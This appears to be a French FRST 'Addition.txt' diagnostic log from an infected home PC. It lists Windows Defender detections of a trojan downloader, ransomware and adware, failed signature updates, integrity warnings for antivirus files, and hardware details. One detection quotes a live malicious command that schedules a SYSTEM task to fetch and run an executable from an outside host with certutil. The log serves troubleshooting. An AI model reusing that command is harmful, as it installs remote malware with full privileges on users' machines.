Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Socelar&threatid=2147734469&enterprise=0
Nom : TrojanDownloader:Win32/Socelar
ID : 2147734469
Gravité : Grave
Catégorie : Cheval de Troie téléchargeur
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\266812\ic-0.36f8c955369b88.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\Rar$EXb2992.33967\squeezehack.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0
Date: 2019-06-04 02:01:50.847
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nom : Trojan:Win32/Ceprolad.A
ID : 2147726914
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://nevernews.club/app/app.exe C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0
Date: 2019-06-04 02:01:19.420
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/CryptInject&threatid=2147725859&enterprise=0
Nom : Trojan:Win32/CryptInject
ID : 2147725859
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\uu35glec.00c\seescenicelfb.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0
Date: 2019-06-04 02:01:01.554
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Ransom:Win32/Shade.C&threatid=2147735695&enterprise=0
Nom : Ransom:Win32/Shade.C
ID : 2147735695
Gravité : Grave
Catégorie : Ransomware
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\bjvieyra.1bh\netstream.exe; file:_C:\Users\Luca\AppData\Local\Temp\u5k1w5w0.ttd\netstream.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0
Date: 2019-06-04 02:00:58.370
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Adware:Win64/CloudGuard&threatid=250533&enterprise=0
Nom : Adware:Win64/CloudGuard
ID : 250533
Gravité : Élevée
Catégorie : Logiciel de publicité
Chemin : file:_C:\Program Files\Homeville\Homeville.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\is-J8HF5.tmp\Hermond.tmp
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0
Date: 2019-06-04 01:54:34.346
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.1577.0
Source de mise à jour : Serveur Microsoft Update
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\Système
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80240022
Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions.
Date: 2019-06-04 01:54:34.345
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.1577.0
Source de mise à jour : Serveur Microsoft Update
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\Système
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80240022
Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions.
CodeIntegrity:
===================================
Date: 2019-06-06 19:24:22.121
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 19:24:22.060
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 19:24:21.904
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 19:24:21.789
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 19:24:21.693
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 19:24:21.692
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 18:55:49.989
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-06-06 18:55:49.988
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Infos Mémoire ===========================
BIOS: American Megatrends Inc. A.20 09/21/2018
Motherboard: Micro-Star International Co., Ltd B450-A PRO (MS-7B86)
Processeur: AMD Ryzen 5 2600 Six-Core Processor
Pourcentage de mémoire utilisée: 59%
Mémoire physique - RAM - totale: 8143.08 MB
Mémoire physique - RAM - disponible: 3294.32 MB
Mémoire virtuelle totale: 19407.08 MB
Mémoire virtuelle disponible: 11727.54 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:222.97 GB) (Free:9.94 GB) NTFS
Drive e: (Donnees) (Fixed) (Total:931.5 GB) (Free:552.39 GB) NTFS
Drive f: (My CDROM) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS
\\?\Volume{d40a1865-ed47-4c13-a2dc-df0bf8f6c155}\ (Récupération) (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{ad378aa8-6064-450e-abd2-065fc4bde4c1}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Fin de Addition.txt ============================